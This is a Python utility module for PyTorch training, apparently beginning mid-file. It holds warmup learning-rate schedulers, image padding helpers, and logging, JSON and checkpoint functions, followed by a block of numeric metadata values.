last_epoch=-1): self.warmup_steps = warmup_steps super(WarmupConstantSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch) def lr_lambda(self, step): if step < self.warmup_steps: return float(step) / float(max(1.0, self.warmup_steps)) return 1. class WarmupLinearSchedule(LambdaLR): """ Linear warmup and then linear decay. Linearly increases learning rate from 0 to 1 over `warmup_steps` training steps. Linearly decreases learning rate from 1. to 0. over remaining `t_total - warmup_steps` steps. """ def __init__(self, optimizer, warmup_steps, t_total, last_epoch=-1): self.warmup_steps = warmup_steps self.t_total = t_total super(WarmupLinearSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch) def lr_lambda(self, step): if step < self.warmup_steps: return float(step) / float(max(1, self.warmup_steps)) return max(0.0, float(self.t_total - step) / float(max(1.0, self.t_total - self.warmup_steps))) class WarmupCosineSchedule(LambdaLR): """ Linear warmup and then cosine decay. Linearly increases learning rate from 0 to 1 over `warmup_steps` training steps. Decreases learning rate from 1. to 0. over remaining `t_total - warmup_steps` steps following a cosine curve. If `cycles` (default=0.5) is different from default, learning rate follows cosine function after warmup. """ def __init__(self, optimizer, warmup_steps, t_total, cycles=.5, last_epoch=-1): self.warmup_steps = warmup_steps self.t_total = t_total self.cycles = cycles super(WarmupCosineSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch) def lr_lambda(self, step): if step < self.warmup_steps: return float(step) / float(max(1.0, self.warmup_steps)) # progress after warmup progress = float(step - self.warmup_steps) / float(max(1, self.t_total - self.warmup_steps)) return max(0.0, 0.5 * (1. + math.cos(math.pi * float(self.cycles) * 2.0 * progress))) def get_padding(image): w, h = image.size max_wh = np.max([w, h]) h_padding = (max_wh - w) / 2 v_padding = (max_wh - h) / 2 l_pad = h_padding if h_padding % 1 == 0 else h_padding + 0.5 t_pad = v_padding if v_padding % 1 == 0 else v_padding + 0.5 r_pad = h_padding if h_padding % 1 == 0 else h_padding - 0.5 b_pad = v_padding if v_padding % 1 == 0 else v_padding - 0.5 padding = (int(l_pad), int(t_pad), int(r_pad), int(b_pad)) return padding class NewPad(object): def __init__(self, fill=0, padding_mode='constant'): assert isinstance(fill, (numbers.Number, str, tuple)) assert padding_mode in ['constant', 'edge', 'reflect', 'symmetric'] self.fill = fill self.padding_mode = padding_mode def __call__(self, img): """ Args: img (PIL Image): Image to be padded. Returns: PIL Image: Padded image. """ return pad(img, get_padding(img), self.fill, self.padding_mode) def __repr__(self): return self.__class__.__name__ + '(padding={0}, fill={1}, padding_mode={2})'. \ format(self.fill, self.padding_mode) def find_device(): device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") return device def read_json(data): with open(data) as f: return json.load(f) def save_json(data, path): with open(path, 'w', encoding='utf-8') as f: json.dump(data, f) def setup_logger(): logger = logging.getLogger('train') logger.setLevel(logging.INFO) if len(logger.handlers) == 0: formatter = logging.Formatter('%(asctime)s | %(message)s') ch = logging.StreamHandler(stream=sys.stdout) ch.setFormatter(formatter) logger.addHandler(ch) return logger def adjust_learning_rate(optimizer, epoch, lr): """Sets the learning rate to the initial LR decayed by 10 every 30 epochs""" lr = lr * (0.1 ** (epoch // 30)) for param_group in optimizer.param_groups: param_group['lr'] = lr def save_checkpoint(model, path): torch.save(model.state_dict(), path) def reverse_norm_image(image): MEAN = torch.tensor([0.485, 0.456, 0.406]) STD = torch.tensor([0.229, 0.224, 0.225]) reverse_image = image * STD[:, None, None] + MEAN[:, None, None] return reverse_image.permute(1, 2, 0).cpu().numpy()
33.761905
117
0.653738
799
5,672
4.439299
0.239049
0.074429
0.050747
0.035523
0.366789
0.343953
0.315478
0.290668
0.259656
0.249507
0
0.023662
0.232546
5,672
168
118
33.761905
0.791179
0.175599
0
0.125
0
0
0.027409
0
0
0
0
0
0.019231
1
0.201923
false
0
0.086538
0.009615
0.471154
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1